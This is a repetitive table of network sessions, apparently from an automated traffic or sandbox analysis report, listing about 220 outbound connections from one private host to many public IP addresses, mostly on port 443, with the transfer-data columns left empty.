                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21520192.168.2.2342186217.217.173.201443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21521192.168.2.2351226220.120.230.241443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21522192.168.2.2352160201.62.21.25443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21523192.168.2.235112418.56.220.113443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21524192.168.2.2355886101.95.14.80443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21525192.168.2.234034887.250.235.124443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21526192.168.2.2354236113.181.233.9443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21527192.168.2.2349028155.236.111.130443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21528192.168.2.2341140137.104.58.68443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21529192.168.2.2353634202.136.253.1443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21530192.168.2.2359680192.35.240.130443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21531192.168.2.2352128217.119.169.178443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21532192.168.2.2348022155.249.237.146443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21533192.168.2.2352908123.189.176.255443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21534192.168.2.236021099.183.33.51443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21535192.168.2.2355240146.248.101.37443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21536192.168.2.2339704126.102.139.73443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21537192.168.2.2342506135.92.1.232443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21538192.168.2.2358838122.127.45.62443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21539192.168.2.234564299.164.26.159443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21540192.168.2.233907067.46.242.65443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21541192.168.2.2335564197.159.34.18443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21542192.168.2.233611076.244.148.22443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21543192.168.2.235903082.179.238.69443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21544192.168.2.2342440171.91.172.144443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21545192.168.2.2348314111.48.130.12443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21546192.168.2.2334118210.84.29.66443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21547192.168.2.2356600218.142.204.80443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21548192.168.2.2360012119.223.234.114443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21549192.168.2.2352130193.210.108.208443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21550192.168.2.2337026179.248.152.81443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21551192.168.2.2338324182.88.122.128443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21552192.168.2.2335594117.251.5.15443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21553192.168.2.2352212206.95.168.216443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21554192.168.2.2338878171.128.219.23443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21555192.168.2.234087414.191.62.47443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21556192.168.2.2356628187.135.74.251443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21557192.168.2.234717025.162.5.2443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21558192.168.2.234906652.109.112.97443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21559192.168.2.235854869.231.192.91443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21560192.168.2.235333085.30.255.53443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21561192.168.2.2353262181.174.182.201443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21562192.168.2.2352608132.61.1.245443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21563192.168.2.233292286.237.232.210443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21564192.168.2.2358702221.191.51.247443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21565192.168.2.2339286195.194.26.191443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21566192.168.2.2359748149.233.162.161443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21567192.168.2.234360459.73.133.142443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21568192.168.2.234115089.218.148.194443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21569192.168.2.234982885.129.83.21443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21570192.168.2.2338288156.64.5.146443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21571192.168.2.2357094210.90.215.116443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21572192.168.2.2340964184.7.215.2443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21573192.168.2.2355680102.62.115.8443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21574192.168.2.2348702150.237.237.205443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21575192.168.2.2334806204.19.12.125443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21576192.168.2.235351094.128.42.246443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21577192.168.2.233485432.231.63.146443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21578192.168.2.2354342116.148.9.235443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21579192.168.2.2345414105.187.51.94443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21580192.168.2.2343030206.90.201.168443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21581192.168.2.2334694170.128.64.29443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21582192.168.2.2335348221.127.41.210443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21583192.168.2.234794276.215.213.246443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21584192.168.2.236017437.25.131.125443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21585192.168.2.235103852.198.187.11443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21586192.168.2.2359056119.118.115.224443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21587192.168.2.2353874140.176.244.254443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21588192.168.2.2356158138.188.90.24443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21589192.168.2.233878694.117.102.50443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21590192.168.2.2352114126.255.104.145443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21591192.168.2.234427894.103.197.192443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21592192.168.2.2339228159.91.229.186443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21593192.168.2.23481602.207.232.254443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21594192.168.2.2345414196.39.184.113443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21595192.168.2.2360598155.10.114.173443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21596192.168.2.235293440.191.37.48443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21597192.168.2.233585487.25.156.202443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21598192.168.2.235451832.59.32.206443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21599192.168.2.2335692161.78.140.44443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21600192.168.2.235802814.56.148.56443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21601192.168.2.233397488.45.249.21443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21602192.168.2.2334274145.72.104.104443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21603192.168.2.235330467.21.123.163443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21604192.168.2.234086883.138.49.120443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21605192.168.2.234725890.48.108.30443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21606192.168.2.233968419.141.113.51443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21607192.168.2.2339056136.58.133.101443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21608192.168.2.2356980177.47.254.234443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21609192.168.2.2341522141.209.115.137443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21610192.168.2.23384204.104.182.237443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21611192.168.2.2336714163.47.80.146443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21612192.168.2.2351830205.82.126.36443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21613192.168.2.234700653.137.155.245443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21614192.168.2.235360018.226.233.158443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21615192.168.2.2343244129.238.3.133443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21616192.168.2.23582768.86.22.201443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21617192.168.2.234031899.176.105.198443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21618192.168.2.235395864.60.227.32443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21619192.168.2.2356522207.134.238.182443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21620192.168.2.2347204182.66.212.58443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21621192.168.2.2345490207.231.32.64443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21622192.168.2.234758684.183.235.236443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21623192.168.2.2356106181.195.224.75443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21624192.168.2.2341254181.67.135.2443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21625192.168.2.2334896203.184.150.73443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21626192.168.2.2349218112.50.127.209443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21627192.168.2.234320676.206.13.250443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21628192.168.2.235106035.64.7.24443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21629192.168.2.2343520164.107.158.129443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21630192.168.2.2345338145.191.156.51443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21631192.168.2.233826446.161.182.239443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21632192.168.2.235129617.214.37.151443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21633192.168.2.2352044142.68.133.136443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21634192.168.2.234595436.41.236.8443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21635192.168.2.2354830185.199.146.87443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21636192.168.2.2339586154.214.87.708080
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21637192.168.2.2351734179.218.111.56443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21638192.168.2.2353970192.150.78.151443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21639192.168.2.2334502134.93.157.171443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21640192.168.2.234092041.179.171.129443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21641192.168.2.2337258167.139.71.219443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21642192.168.2.2346124203.34.154.111443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21643192.168.2.2346150103.218.197.224443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21644192.168.2.2345146184.104.209.35443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21645192.168.2.2351454187.72.71.151443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21646192.168.2.234933292.101.71.45443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21647192.168.2.234149886.7.192.160443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21648192.168.2.2344428206.87.30.139443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21649192.168.2.2358610178.182.98.4443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21650192.168.2.233393252.61.246.29443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21651192.168.2.235228694.103.223.101443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21652192.168.2.2350036156.27.154.208443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21653192.168.2.2338152222.30.11.66443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21654192.168.2.2357428150.161.220.48443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21655192.168.2.235125486.140.14.95443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21656192.168.2.233894476.52.119.125443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21657192.168.2.236004476.243.22.77443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21658192.168.2.235702646.143.178.164443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21659192.168.2.2341804176.201.76.182443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21660192.168.2.2358816189.143.119.199443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21661192.168.2.2360402182.161.181.176443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21662192.168.2.2346578201.26.240.244443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21663192.168.2.2333594202.246.193.93443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21664192.168.2.234070432.187.250.3443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21665192.168.2.235303291.64.202.7443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21666192.168.2.236042258.227.227.128443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21667192.168.2.234306664.102.182.133443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21668192.168.2.2337162160.63.137.22443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21669192.168.2.2342564104.123.222.46443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21670192.168.2.2341528151.56.47.24443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21671192.168.2.2333196216.127.77.120443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21672192.168.2.2338496123.169.167.253443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21673192.168.2.235911464.148.221.153443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21674192.168.2.2339538203.21.191.154443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21675192.168.2.235613876.71.135.184443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21676192.168.2.234064824.249.1.59443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21677192.168.2.2359960109.243.155.138443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21678192.168.2.2345850150.208.71.108443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21679192.168.2.2335044210.54.8.32443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21680192.168.2.2334212150.230.247.245443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21681192.168.2.235455864.160.1.178443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21682192.168.2.233694463.214.3.171443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21683192.168.2.2346382126.129.64.67443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21684192.168.2.2333822194.184.49.202443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21685192.168.2.2346310128.210.164.222443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21686192.168.2.233436027.101.99.165443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21687192.168.2.2345618138.25.146.156443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21688192.168.2.2354536181.225.84.178443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21689192.168.2.233317625.216.65.199443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21690192.168.2.2350068178.120.10.199443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21691192.168.2.2353314128.6.235.95443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21692192.168.2.234294417.168.190.196443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21693192.168.2.23381688.118.52.113443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21694192.168.2.2334048144.250.232.0443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21695192.168.2.235458469.42.221.92443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21696192.168.2.234058884.191.242.54443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21697192.168.2.2360820134.4.162.220443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21698192.168.2.2359326219.6.253.237443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21699192.168.2.2358412126.140.20.46443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21700192.168.2.2339686108.251.127.19443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21701192.168.2.235074066.8.143.243443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21702192.168.2.2339096216.64.202.0443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21703192.168.2.235591638.35.183.141443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21704192.168.2.2333314161.21.234.111443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21705192.168.2.235643025.189.235.12443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21706192.168.2.235894620.191.183.86443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21707192.168.2.236073044.123.114.81443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21708192.168.2.233812482.152.202.143443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21709192.168.2.233872812.223.206.56443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21710192.168.2.234988436.96.130.102443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21711192.168.2.2359664180.141.238.30443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21712192.168.2.234260241.169.176.66443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21713192.168.2.2349094150.1.247.234443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21714192.168.2.2349368112.134.65.187443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21715192.168.2.2358192142.184.244.151443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21716192.168.2.2335288161.116.18.145443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21717192.168.2.234797632.218.204.244443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21718192.168.2.2351862148.111.134.37443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21719192.168.2.2348820213.179.199.44443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21720192.168.2.235448244.128.3.76443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21721192.168.2.2333908173.172.246.89443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21722192.168.2.233642868.159.11.158443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21723192.168.2.233659849.132.243.53443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21724192.168.2.2340952217.185.154.189443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21725192.168.2.236043018.13.52.35443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21726192.168.2.235092818.203.231.205443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21727192.168.2.235942643.135.150.149443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21728192.168.2.2346076156.58.207.11443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21729192.168.2.233822025.245.176.86443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21730192.168.2.2358122133.94.119.66443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21731192.168.2.2343388129.131.23.89443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21732192.168.2.23576605.52.49.233443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21733192.168.2.233581853.38.239.36443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21734192.168.2.234359085.136.58.128443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21735192.168.2.2355156122.26.246.173443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21736192.168.2.235679038.80.153.245443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21737192.168.2.2352290218.12.202.182443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21738192.168.2.2346966216.23.123.241443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21739192.168.2.234149645.143.55.72443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21740192.168.2.2343802218.134.91.170443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
